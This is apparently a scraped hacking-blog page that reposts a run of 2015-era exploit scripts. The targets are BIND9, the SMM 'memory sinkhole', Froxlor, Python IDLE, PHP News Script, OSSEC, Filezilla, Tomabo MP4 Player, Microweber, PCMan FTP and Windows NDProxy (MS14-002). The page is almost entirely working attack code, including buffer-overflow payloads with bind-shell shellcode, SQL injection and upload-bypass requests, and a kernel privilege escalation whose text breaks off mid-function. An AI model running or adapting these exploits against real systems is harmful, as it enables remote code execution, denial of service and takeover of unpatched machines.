#!/usr/bin/env python
# Exploit Title: PoC for BIND9 TKEY DoS
# Exploit Author: elceef
# Software Link: https://github.com/elceef/tkeypoc/
# Version: ISC BIND 9
# Tested on: multiple
# CVE : CVE-2015-5477
import socket
import sys
print('CVE-2015-5477 BIND9 TKEY PoC')
if len(sys.argv) < 2:
print('Usage: ' + sys.argv[0] + ' [target]')
sys.exit(1)
print('Sending packet to ' + sys.argv[1] + ' ...')
payload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex'))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], 53))
print('Done.')
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863293579
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
; memory sinkhole proof of concept
; hijack ring -2 execution through the apic overlay attack.
; deployed in ring 0
; the SMBASE register of the core under attack
TARGET_SMBASE equ 0x1f5ef800
; the location of the attack GDT.
; this is determined by which register will be read out of the APIC
; for the GDT base. the APIC registers at this range are hardwired,
; and outside of our control; the SMM code will generally be reading
; from APIC registers in the 0xb00 range if the SMM handler is page
; aligned, or the 0x300 range if the SMM handler is not page aligned.
; the register will be 0 if the SMM handler is aligned to a page
; boundary, or 0x10000 if it is not.
GDT_ADDRESS equ 0x10000
; the value added to SMBASE by the SMM handler to compute the
; protected mode far jump offset. we could eliminate the need for an
; exact value with a nop sled in the hook.
FJMP_OFFSET equ 0x8097
; the offset of the SMM DSC structure from which the handler loads
; critical information
DSC_OFFSET equ 0xfb00
; the descriptor value used in the SMM handler’s far jump
DESCRIPTOR_ADDRESS equ 0x10
; MSR number for the APIC location
APIC_BASE_MSR equ 0x1b
; the target memory address to sinkhole
SINKHOLE equ ((TARGET_SMBASE+DSC_OFFSET)&0xfffff000)
; we will hijack the default SMM handler and point it to a payload
; at this physical address.
PAYLOAD_OFFSET equ 0x1000
; compute the desired base address of the CS descriptor in the GDT.
; this is calculated so that the fjmp performed in SMM is perfectly
; redirected to the payload hook at PAYLOAD_OFFSET.
CS_BASE equ (PAYLOAD_OFFSET-FJMP_OFFSET)
; we target the boot strap processor for hijacking.
APIC_BSP equ 0x100
; the APIC must be activated for the attack to work.
APIC_ACTIVE equ 0x800
;;; begin attack ;;;
; clear the processor caches,
; to prevent bypassing the memory sinkhole on data fetches
wbinvd
; construct a hijack GDT in memory under our control
; note: assume writing to identity mapped memory.
; if non-identity mapped, translate these through the page tables first.
mov dword [dword GDT_ADDRESS+DESCRIPTOR_ADDRESS+4],
(CS_BASE&0xff000000) | (0x00cf9a00) |
(CS_BASE&0x00ff0000)>>16
mov dword [dword GDT_ADDRESS+DESCRIPTOR_ADDRESS+0],
(CS_BASE&0x0000ffff)<<16 | 0xffff
; remap the APIC to sinkhole SMM’s DSC structure
mov eax, SINKHOLE | APIC_ACTIVE | APIC_BSP
mov edx, 0
mov ecx, APIC_BASE_MSR
wrmsr
; wait for a periodic SMI to be triggered
jmp $
#------------------------------------------------------------------------------------------#
# Exploit Title: Froxlor Server Management Panel - MySQL Login Information Disclosure #
# Date: Jul 30 2015 #
# Exploit Author: Dustin Dörr #
# Vendor Homepage: https://www.froxlor.org/ #
# Version: <= 0.9.33.1 #
#------------------------------------------------------------------------------------------#
An unauthenticated remote attacker is able to get the Froxlor MySQL password and username
via webaccess due to wrong file permissions of the /logs/ folder in Froxlor version
0.9.33.1 and earlier. The plain MySQL password and username may be stored in the
/logs/sql-error.log file. This directory is publicly reachable by default.
some default URLs are:
- http://example.com/froxlor/logs/sql-error.log
- http://cp.example.com/logs/sql-error.log
- http://froxlor.example.com/logs/sql-error.log
the certain section looks like this:
/var/www/froxlor/lib/classes/database/class.Database.php(279):
PDO->__construct('mysql:host=127....', 'DATABASE_USER', 'DATABASE_PASSWORD', Array)
please note that the password in the logfile is truncated to 15 chars,
therefore passwords longer than 15 chars are not fully visible to an attacker.
#!/usr/bin/env python
# Title : Python IDLE 2.7.8 - Crash Proof Of Concept
# Website : http://www.python.org/idle/
# Tested : Windows 7 / Windows 8.1
#
#
# Author : Hadi Zomorodi Monavar
# Email : zomorodihadi@gmail.com
#
# 1 . run python code : python poc.py
# 2 . open r3z4.txt and copy content to clipboard
# 3 . open "python 2.7.8 IDLE"
# 4 . from Menu (edit --> find)
# 5 . Paste ClipBoard on "find"
# 6 . Enter
# 7 . Crashed ;)
crash = "\x41"*900000 #B0F
file = open("r3z4.txt", "w")
file.write(crash)
file.close()
# Exploit Title: PHP News Script 4.0.0 Sql Injection
# Date: 2015-08-01
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://phpnewsscript.com/
# Version: 4.0.0
# Tested on: CentOS
Exploit :
http://server/allgallery.php?id=-9999%27+[sql-command]+%23
Test :
http://server/demo/allgallery.php?id=-100%27+union+select+user()%23
###########################################################
# Exploit Title: [OSSEC]
# Date: [2015-08-01]
# Exploit Author: [Milad Saber]
# Vendor Homepage: [www.ossec.net]
# Software Link: [www.ossec.net/files/ossec-wui-0.8.tar.gz]
# Version: [0.8]
# Tested on: [OSSEC Manager]
# Exploit for DOS ossec server.
# Please install ossec server and WUI 0.8 and run this exploit
##########################################################
import socket
import sys
import time
# specify payload
payload = '[ "$(id -u)" == "0" ] && touch /var/ossec/ossec.conf' # to exploit only on root
user = 'root'
pwd = 'var'
if len(sys.argv) != 2:
sys.stderr.write("[-]Usage: python %s <ip>\ossec-wui-0.8" % sys.argv[0])
sys.stderr.write("[-]Exemple: python %s 127.0.0.1\ossec-wui-0.8" % sys.argv[0])
sys.exit(1)
ip = sys.argv[1]
def recv(s):
s.recv(1024)
time.sleep(0.2)
try:
print "[+]Connecting to milad exploit ..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,4555))
s.recv(1024)
s.send(user + "\n")
s.recv(1024)
s.send(pwd + "\n")
s.recv(1024)
print "[+]Creating user..."
s.send("adduser ../../../../../../../../var/ossec/ossec.conf exploit\n")
s.recv(1024)
s.send("quit\n")
s.close()
print "[+]Connecting to SMTP server..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,25,80))
s.send("hello milad@milad.pl\r\n")
recv(s)
print "[+]Sending payload..."
s.send("mail from: <'@milad.pl>\r\n")
recv(s)
# also try s.send("rcpt to: <../../../../../../../../var/ossec/ossec.conf/r\n") if the recipient cannot be found
s.send("rcpt to: <../../../../../../../../var/ossec/ossec.conf\r\n")
recv(s)
s.send("data\r\n")
recv(s)
s.send("From: milad@milad.pl\r\n")
s.send("\r\n")
s.send("'\n")
s.send(payload + "\n")
s.send("\r\n.\r\n")
recv(s)
s.send("quit\r\n")
recv(s)
s.close()
print "[+]Done! Payload will be executed once somebody logs in."
except:
print "Connection failed."
# Exploit Title: Filezilla client 2.2.X SEH buffer overflow exploit
# Date: 02/08/2015
# Exploit Author: ly0n
# Vendor Homepage: filezilla-project.org/
# Software Link: http://www.oldapps.com/filezilla.php?app=7cdf14e88e9dfa85fb661c1c6e649e90
# Version: tested on filezilla 2.2.21
# Tested on: Windows XP sp3 english
#!/usr/bin/env python2
# coding: utf-8
import os,socket,threading,time
#import traceback
# visit: ly0n.me
# greetz: NBS
#MSGBOX "BrokenByte"
msgbox = ("\x68\x6e\x33\x72\x00\x68\x75\x74"
"\x69\x30\x68\x5e\x58\x65\x63\x89"
"\xe3\x68\x20\x20\x20\x00\x68\x68"
"\x65\x72\x65\x68\x77\x61\x73\x20"
"\x68\x6e\x33\x72\x20\x68\x75\x74"
"\x69\x30\x68\x5e\x58\x65\x63\x89"
"\xe1\x31\xc0\x50\x53\x51\x50\x50"
"\xbe\xea\x07\x45\x7e\xff\xe6\x31"
"\xc0\x50\xb8\x12\xcb\x81\x7c\xff"
"\xe0")
nops = "\x90" * 100
#77EA9CAC POP POP RET kernel32.dll <- seh
#EB069090 SHORT JUMP 6 POS + 2 NOPS <- nseh
nseh = "\xeb\x06\x90\x90"
seh = "\xAC\x9C\xEA\x77"
allow_delete = False
local_ip = "192.168.11.6" #SERVER LOCAL IP
local_port = 21 #DESIRED PORT
buffer1 = "\x41" * 1896 + nseh + seh + nops + msgbox + nops
buffer = buffer1 + ".txt"
currdir=os.path.abspath('.')
class FTPserverThread(threading.Thread):
def __init__(self,(conn,addr)):
self.conn=conn
self.addr=addr
self.basewd=currdir
self.cwd=self.basewd
self.rest=False
self.pasv_mode=False
threading.Thread.__init__(self)
def run(self):
self.conn.send('220 Welcome!\r\n')
while True:
cmd=self.conn.recv(256)
if not cmd: break
else:
print 'Recieved:',cmd
try:
func=getattr(self,cmd[:4].strip().upper())
func(cmd)
except Exception,e:
print 'ERROR:',e
#traceback.print_exc()
self.conn.send('500 Sorry.\r\n')
def SYST(self,cmd):
self.conn.send('215 UNIX Type: L8\r\n')
def OPTS(self,cmd):
if cmd[5:-2].upper()=='UTF8 ON':
self.conn.send('200 OK.\r\n')
else:
self.conn.send('451 Sorry.\r\n')
def USER(self,cmd):
self.conn.send('331 OK.\r\n')
def PASS(self,cmd):
self.conn.send('230 OK.\r\n')
#self.conn.send('530 Incorrect.\r\n')
def QUIT(self,cmd):
self.conn.send('221 Goodbye.\r\n')
def NOOP(self,cmd):
self.conn.send('200 OK.\r\n')
def TYPE(self,cmd):
self.mode=cmd[5]
self.conn.send('200 Binary mode.\r\n')
def CDUP(self,cmd):
if not os.path.samefile(self.cwd,self.basewd):
#learn from stackoverflow
self.cwd=os.path.abspath(os.path.join(self.cwd,'..'))
self.conn.send('200 OK.\r\n')
def PWD(self,cmd):
cwd=os.path.relpath(self.cwd,self.basewd)
if cwd=='.':
cwd='/'
else:
cwd='/'+cwd
self.conn.send('257 \"%s\"\r\n' % cwd)
def CWD(self,cmd):
chwd=cmd[4:-2]
if chwd=='/':
self.cwd=self.basewd
elif chwd[0]=='/':
self.cwd=os.path.join(self.basewd,chwd[1:])
else:
self.cwd=os.path.join(self.cwd,chwd)
self.conn.send('250 OK.\r\n')
def PORT(self,cmd):
if self.pasv_mode:
self.servsock.close()
self.pasv_mode = False
l=cmd[5:].split(',')
self.dataAddr='.'.join(l[:4])
self.dataPort=(int(l[4])<<8)+int(l[5])
self.conn.send('200 Get port.\r\n')
def PASV(self,cmd): # from http://goo.gl/3if2U
self.pasv_mode = True
self.servsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.servsock.bind((local_ip,0))
self.servsock.listen(1)
ip, port = self.servsock.getsockname()
print 'open', ip, port
self.conn.send('227 Entering Passive Mode (%s,%u,%u).\r\n' %
(','.join(ip.split('.')), port>>8&0xFF, port&0xFF))
def start_datasock(self):
if self.pasv_mode:
self.datasock, addr = self.servsock.accept()
print 'connect:', addr
else:
self.datasock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.datasock.connect((self.dataAddr,self.dataPort))
def stop_datasock(self):
self.datasock.close()
if self.pasv_mode:
self.servsock.close()
def LIST(self,cmd):
self.conn.send('150 Here comes the directory listing.\r\n')
print 'list:', self.cwd
self.start_datasock()
dirlist = "drwxrwxrwx 1 100 0 11111 Jun 11 21:10" +buffer1+"\r\n\n"
dirlist += "-rw-rw-r-- 1 1176 1176 1060 Aug 16 22:22 "+buffer+" \r\n\n"
self.datasock.send("total 2\r\n"+dirlist)
self.stop_datasock()
self.conn.send('226 Directory send OK.\r\n')
def toListItem(self,fn):
st=os.stat(fn)
fullmode='rwxrwxrwx'
mode=''
for i in range(9):
mode+=((st.st_mode>>(8-i))&1) and fullmode[i] or '-'
d=(os.path.isdir(fn)) and 'd' or '-'
ftime=time.strftime(' %b %d %H:%M ', time.gmtime(st.st_mtime))
return d+mode+' 1 user group '+str(st.st_size)+ftime+os.path.basename(fn)
def MKD(self,cmd):
dn=os.path.join(self.cwd,cmd[4:-2])
os.mkdir(dn)
self.conn.send('257 Directory created.\r\n')
def RMD(self,cmd):
dn=os.path.join(self.cwd,cmd[4:-2])
if allow_delete:
os.rmdir(dn)
self.conn.send('250 Directory deleted.\r\n')
else:
self.conn.send('450 Not allowed.\r\n')
def DELE(self,cmd):
fn=os.path.join(self.cwd,cmd[5:-2])
if allow_delete:
os.remove(fn)
self.conn.send('250 File deleted.\r\n')
else:
self.conn.send('450 Not allowed.\r\n')
def RNFR(self,cmd):
self.rnfn=os.path.join(self.cwd,cmd[5:-2])
self.conn.send('350 Ready.\r\n')
def RNTO(self,cmd):
fn=os.path.join(self.cwd,cmd[5:-2])
os.rename(self.rnfn,fn)
self.conn.send('250 File renamed.\r\n')
def REST(self,cmd):
self.pos=int(cmd[5:-2])
self.rest=True
self.conn.send('250 File position reseted.\r\n')
def RETR(self,cmd):
fn=os.path.join(self.cwd,cmd[5:-2])
#fn=os.path.join(self.cwd,cmd[5:-2]).lstrip('/')
print 'Downlowding:',fn
if self.mode=='I':
fi=open(fn,'rb')
else:
fi=open(fn,'r')
self.conn.send('150 Opening data connection.\r\n')
if self.rest:
fi.seek(self.pos)
self.rest=False
data= fi.read(1024)
self.start_datasock()
while data:
self.datasock.send(data)
data=fi.read(1024)
fi.close()
self.stop_datasock()
self.conn.send('226 Transfer complete.\r\n')
def STOR(self,cmd):
fn=os.path.join(self.cwd,cmd[5:-2])
print 'Uplaoding:',fn
if self.mode=='I':
fo=open(fn,'wb')
else:
fo=open(fn,'w')
self.conn.send('150 Opening data connection.\r\n')
self.start_datasock()
while True:
data=self.datasock.recv(1024)
if not data: break
fo.write(data)
fo.close()
self.stop_datasock()
self.conn.send('226 Transfer complete.\r\n')
class FTPserver(threading.Thread):
def __init__(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind((local_ip,local_port))
threading.Thread.__init__(self)
def run(self):
self.sock.listen(5)
while True:
th=FTPserverThread(self.sock.accept())
th.daemon=True
th.start()
def stop(self):
self.sock.close()
if __name__=='__main__':
ftp=FTPserver()
ftp.daemon=True
ftp.start()
print 'On', local_ip, ':', local_port
raw_input('Enter to end...\n')
ftp.stop()
#!/usr/bin/python
# Exploit Title: Tomabo MP4 Player 3.11.3 - (.m3u) SEH Buffer Overflow
# Date: 03/08/2015
# Exploit Author: Saeid Atabaki
# E-Mail: bytecod3r <at> gmail.com, saeid <at> Nsecurity.org
# Linkedin: https://www.linkedin.com/in/saeidatabaki
# Vendor Homepage: http://tomabo.com/mp4-player/index.html
# Version: 3.11.3
# Tested on: Windows XP SP3
#---------------------------------------------------------------------#
# Badchars: "\x00\x0a\x0d\x0c\x20\x09\x1a"'
#
# nc 192.168.11.136 8080
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Administrator\Desktop>
#---------------------------------------------------------------------#
import sys, struct
file="crash.m3u"
# Windows bind shell port 8080, feel free to swap shellcode
sc = ""
sc += "\xdd\xc1\xd9\x74\x24\xf4\xb8\xd3\x4b\xb2\xa4\x5d\x31"
sc += "\xc9\xb1\x53\x31\x45\x17\x83\xc5\x04\x03\x96\x58\x50"
sc += "\x51\xe4\xb7\x16\x9a\x14\x48\x77\x12\xf1\x79\xb7\x40"
sc += "\x72\x29\x07\x02\xd6\xc6\xec\x46\xc2\x5d\x80\x4e\xe5"
sc += "\xd6\x2f\xa9\xc8\xe7\x1c\x89\x4b\x64\x5f\xde\xab\x55"
sc += "\x90\x13\xaa\x92\xcd\xde\xfe\x4b\x99\x4d\xee\xf8\xd7"
sc += "\x4d\x85\xb3\xf6\xd5\x7a\x03\xf8\xf4\x2d\x1f\xa3\xd6"
sc += "\xcc\xcc\xdf\x5e\xd6\x11\xe5\x29\x6d\xe1\x91\xab\xa7"
sc += "\x3b\x59\x07\x86\xf3\xa8\x59\xcf\x34\x53\x2c\x39\x47"
sc += "\xee\x37\xfe\x35\x34\xbd\xe4\x9e\xbf\x65\xc0\x1f\x13"
sc += "\xf3\x83\x2c\xd8\x77\xcb\x30\xdf\x54\x60\x4c\x54\x5b"
sc += "\xa6\xc4\x2e\x78\x62\x8c\xf5\xe1\x33\x68\x5b\x1d\x23"
sc += "\xd3\x04\xbb\x28\xfe\x51\xb6\x73\x97\x96\xfb\x8b\x67"
sc += "\xb1\x8c\xf8\x55\x1e\x27\x96\xd5\xd7\xe1\x61\x19\xc2"
sc += "\x56\xfd\xe4\xed\xa6\xd4\x22\xb9\xf6\x4e\x82\xc2\x9c"
sc += "\x8e\x2b\x17\x08\x86\x8a\xc8\x2f\x6b\x6c\xb9\xef\xc3"
sc += "\x05\xd3\xff\x3c\x35\xdc\xd5\x55\xde\x21\xd6\x46\x8f"
sc += "\xaf\x30\x12\xbf\xf9\xeb\x8a\x7d\xde\x23\x2d\x7d\x34"
sc += "\x1c\xd9\x36\x5e\x9b\xe6\xc6\x74\x8b\x70\x4d\x9b\x0f"
sc += "\x61\x52\xb6\x27\xf6\xc5\x4c\xa6\xb5\x74\x50\xe3\x2d"
sc += "\x14\xc3\x68\xad\x53\xf8\x26\xfa\x34\xce\x3e\x6e\xa9"
sc += "\x69\xe9\x8c\x30\xef\xd2\x14\xef\xcc\xdd\x95\x62\x68"
sc += "\xfa\x85\xba\x71\x46\xf1\x12\x24\x10\xaf\xd4\x9e\xd2"
sc += "\x19\x8f\x4d\xbd\xcd\x56\xbe\x7e\x8b\x56\xeb\x08\x73"
sc += "\xe6\x42\x4d\x8c\xc7\x02\x59\xf5\x35\xb3\xa6\x2c\xfe"
sc += "\xc3\xec\x6c\x57\x4c\xa9\xe5\xe5\x11\x4a\xd0\x2a\x2c"
sc += "\xc9\xd0\xd2\xcb\xd1\x91\xd7\x90\x55\x4a\xaa\x89\x33"
sc += "\x6c\x19\xa9\x11"
payload = "\x90" * 1028 + "\xeb\x18\x90\x90" + "\x69\x9e\x48\x00" + "\x90" * 20 + sc
writeFile = open (file, "w")
writeFile.write( payload )
writeFile.close()
Microweber v1.0.3 File Upload Filter Bypass Remote PHP Code Execution
Vendor: Microweber Team
Product web page: http://www.microweber.com
Affected version: 1.0.3
Summary: Microweber is an open source drag and drop PHP/Laravel CMS licensed
under Apache License, Version 2.0 which allows you to create your own website,
blog or online shop.
Desc: Microweber suffers from an authenticated arbitrary command execution
vulnerability. The issue is caused due to the improper verification when
uploading files in '/src/Microweber/functions/plupload.php' script. This
can be exploited to execute arbitrary PHP code by bypassing the extension
restriction by putting the dot character at the end of the filename and uploading
a malicious PHP script file that will be stored in '/userfiles/media/localhost/uploaded'
directory.
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5250
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5250.php
12.07.2015
--
PoC Requests:
-------------
1.
POST /microweber-latest/plupload?token=1111111111222222222233333333334444444444&path=media%25255Clocalhost%25255C&path=media%255Clocalhost%255Cuploaded%255C HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 319
Origin: http://localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqX83MP6Cg5JpA193
Accept: */*
Referer: http://localhost/microweber-latest/editor_tools/plupload?type=explorer&filters=*&multiple=true&autostart=undefined&mwv=1.0.3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: mwui=%7B%22%23modules-and-layouts%2C%23tab_modules%2C.tst-modules%22%3A%22true%22%7D; recommend=%7B%22logo%22%3A1%7D; back_to_admin=http%3A//localhost/microweber-latest/admin/view%3Amodules/load_module%3Afiles%23path%3Dmedia%255Clocalhost%255Cuploaded%255C%26select-file%3Dhttp%3A//localhost/microweber-latest/userfiles/media/localhost/uploaded/phpinfo.php; laravel_session=eyJpdiI6ImNYNnkyWjJkOXZyTVRDMXlcL0pKQzBRPT0iLCJ2YWx1ZSI6Ilp6QjhDYjRRMEY4NGR5RzVuZGNxSnd1V3dGQ1R6OVdaWjZrZStiT1Q2bVM3UmRoQjNrak1ORzV5bXZjbzVDSitqdVVkdzdqOFVQa2hZdWRwMlwvMSttZz09IiwibWFjIjoiNGQxYzkwOTk4YmIzNTgzNWRiZmZlOTM4N2I2MzA1NjIzODcwNWRmMWM5ZDcwN2YxMGJlZmQ2ZjUxYmMzNjVjOSJ9
------WebKitFormBoundaryqX83MP6Cg5JpA193
Content-Disposition: form-data; name="name"
phpinfo.php.
------WebKitFormBoundaryqX83MP6Cg5JpA193
Content-Disposition: form-data; name="file"; filename="phpinfo.php."
Content-Type: application/octet-stream
<?php
phpinfo();
?>
------WebKitFormBoundaryqX83MP6Cg5JpA193--
2.
GET http://localhost/microweber-latest/userfiles/media/localhost/uploaded/phpinfo.php HTTP/1.1
#!/usr/bin/python
# title: PCMan FTP Server v2.0.7 Buffer Overflow - PUT Command
# author: @shipcod3 (Jay Turla)
# nc <host> 9988
# Tested on Windows XP Service Pack 3 - English
# description: Buffer overflow is triggered upon sending long string using the command PUT to PCMAN FTP 2.07
import socket
import sys
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D' -t c
shellcode = (
"\xdb\xd0\xbb\x36\xcc\x70\x15\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x56\x83\xc2\x04\x31\x5a\x14\x03\x5a\x22\x2e\x85\xe9\xa2\x27"
"\x66\x12\x32\x58\xee\xf7\x03\x4a\x94\x7c\x31\x5a\xde\xd1\xb9"
"\x11\xb2\xc1\x4a\x57\x1b\xe5\xfb\xd2\x7d\xc8\xfc\xd2\x41\x86"
"\x3e\x74\x3e\xd5\x12\x56\x7f\x16\x67\x97\xb8\x4b\x87\xc5\x11"
"\x07\x35\xfa\x16\x55\x85\xfb\xf8\xd1\xb5\x83\x7d\x25\x41\x3e"
"\x7f\x76\xf9\x35\x37\x6e\x72\x11\xe8\x8f\x57\x41\xd4\xc6\xdc"
"\xb2\xae\xd8\x34\x8b\x4f\xeb\x78\x40\x6e\xc3\x75\x98\xb6\xe4"
"\x65\xef\xcc\x16\x18\xe8\x16\x64\xc6\x7d\x8b\xce\x8d\x26\x6f"
"\xee\x42\xb0\xe4\xfc\x2f\xb6\xa3\xe0\xae\x1b\xd8\x1d\x3b\x9a"
"\x0f\x94\x7f\xb9\x8b\xfc\x24\xa0\x8a\x58\x8b\xdd\xcd\x05\x74"
"\x78\x85\xa4\x61\xfa\xc4\xa0\x46\x31\xf7\x30\xc0\x42\x84\x02"
"\x4f\xf9\x02\x2f\x18\x27\xd4\x50\x33\x9f\x4a\xaf\xbb\xe0\x43"
"\x74\xef\xb0\xfb\x5d\x8f\x5a\xfc\x62\x5a\xcc\xac\xcc\x34\xad"
"\x1c\xad\xe4\x45\x77\x22\xdb\x76\x78\xe8\x6a\xb1\xb6\xc8\x3f"
"\x56\xbb\xee\x98\xa2\x32\x08\x8c\xba\x12\x82\x38\x79\x41\x1b"
"\xdf\x82\xa3\x37\x48\x15\xfb\x51\x4e\x1a\xfc\x77\xfd\xb7\x54"
"\x10\x75\xd4\x60\x01\x8a\xf1\xc0\x48\xb3\x92\x9b\x24\x76\x02"
"\x9b\x6c\xe0\xa7\x0e\xeb\xf0\xae\x32\xa4\xa7\xe7\x85\xbd\x2d"
"\x1a\xbf\x17\x53\xe7\x59\x5f\xd7\x3c\x9a\x5e\xd6\xb1\xa6\x44"
"\xc8\x0f\x26\xc1\xbc\xdf\x71\x9f\x6a\xa6\x2b\x51\xc4\x70\x87"
"\x3b\x80\x05\xeb\xfb\xd6\x09\x26\x8a\x36\xbb\x9f\xcb\x49\x74"
"\x48\xdc\x32\x68\xe8\x23\xe9\x28\x18\x6e\xb3\x19\xb1\x37\x26"
"\x18\xdc\xc7\x9d\x5f\xd9\x4b\x17\x20\x1e\x53\x52\x25\x5a\xd3"
"\x8f\x57\xf3\xb6\xaf\xc4\xf4\x92")
buffer = "\x90" * 30 + shellcode
#77c35459 : push esp # ret | {PAGE_EXECUTE_READ} [msvcrt.dll]
evil = "A"*2008 + "\x59\x54\xC3\x77" + buffer + "C"*(888-len(buffer))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((raw_input('Enter Host:'),21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('PUT ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close
/*
################################################################
# Exploit Title: Windows NDProxy Privilege Escalation (MS14-002)
# Date: 2015-08-03
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
# Windows XP SP3 x86
# Windows XP SP2 x86-64
# Windows 2003 SP2 x86
# Windows 2003 SP2 x86-64
# Windows 2003 SP2 IA-64
# Supported vulnerable software:
# Windows XP SP3 x86
# Windows 2003 SP2 x86
# Tested on:
# Windows XP SP3 x86 EN
# Windows 2003 SP2 x86 EN
# CVE ID: 2013-5065
################################################################
# Vulnerability description:
# NDPROXY is a system-provided driver that interfaces WAN
# miniport drivers, call managers, and miniport call managers
# to the Telephony Application Programming Interfaces (TAPI)
# services.
# The vulnerability is caused when the NDProxy.sys kernel
# component fails to properly validate input.
# An attacker who successfully exploited this vulnerability
# could run arbitrary code in kernel mode (i.e. with SYSTEM
# privileges).
################################################################
# Exploit notes:
# Privileged shell execution:
# - the SYSTEM shell will spawn within the existing shell
# (i.e. exploit usable via a remote shell)
# Exploit compiling:
# - # i586-mingw32msvc-gcc MS14-002.c -o MS14-002.exe
# Exploit prerequisites:
# - low privilege access to the target (remote shell or RDP)
# - target not patched (KB2914368 not installed)
# - service "Routing and Remote Access" running on the target
# - "Power User" user group can start and stop services
# - > sc query remoteaccess
# - > sc start remoteaccess
################################################################
# Thanks to:
# Andy (C PoC - Win XP SP3)
# ryujin (Python PoC - Win XP SP3)
################################################################
# References:
# http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5065
# https://technet.microsoft.com/en-us/library/security/ms14-002.aspx
# https://penturalabs.wordpress.com/2013/12/11/ndproxy-privilege-escalation-cve-2013-5065/
# https://www.exploit-db.com/exploits/30014/
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms681674%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363216%28v=vs.85%29.aspx
################################################################
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
typedef struct {
PVOID Unknown1;
PVOID Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
typedef DWORD NTSTATUS;
NTSTATUS (WINAPI *_NtQuerySystemInformation) (SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
static VOID InitFirstPage (void)
{
PVOID BaseAddress;
ULONG RegionSize;
NTSTATUS ReturnCode;
FARPROC NtAllocateVirtualMemory;
NtAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "NtAllocateVirtualMemory");
fprintf (stderr, "[+] NtAllocateVirtualMemory@%p\n", NtAllocateVirtualMemory);
RegionSize = 0xf000;
BaseAddress = (PVOID) 0x00000001;
ReturnCode = NtAllocateVirtualMemory (GetCurrentProcess (),
&BaseAddress,
0,
&RegionSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (ReturnCode != 0)
{
fprintf (stderr, "[-] NtAllocateVirtualMemory() failed to map first page\n");
fprintf (stderr, " Error code: %#X\n", ReturnCode);
fflush (stderr);
ExitProcess (1);
}
fprintf (stderr, "[+] BaseAddress: %p, RegionSize: %#x\n", BaseAddress, RegionSize), fflush (stderr);
FillMemory (BaseAddress, RegionSize, 0x41);
return;
}
int exploit (unsigned char *shellcode)
{
DWORD writtenBytes;
int returnValue;
InitFirstPage ();
unsigned char *shellcodeBuffer;
shellcodeBuffer = (char *) malloc (400);
memset (shellcodeBuffer, (int) "xCC", 400);
memcpy (shellcodeBuffer, shellcode, 112);
returnValue = WriteProcessMemory ((HANDLE) 0xFFFFFFFF, (LPVOID) 0x00000001, shellcodeBuffer, 0x400, &writtenBytes);
if (returnValue == 0)
{
printf ("[-] Attempt to map memory_write failed\n");
printf (" Error code: %d\n", GetLastError ());
exit(1);
}
HANDLE ndProxyDeviceHandle = CreateFileA ("\\\\.\\NDProxy", 0, 0, NULL, OPEN_EXISTING, 0, NULL);
if (ndProxyDeviceHandle == INVALID_HANDLE_VALUE)
{
printf ("[-] Creating a device handle on NDProxy failed\n");
printf (" Error code: %d\n", GetLastError());
exit (0);
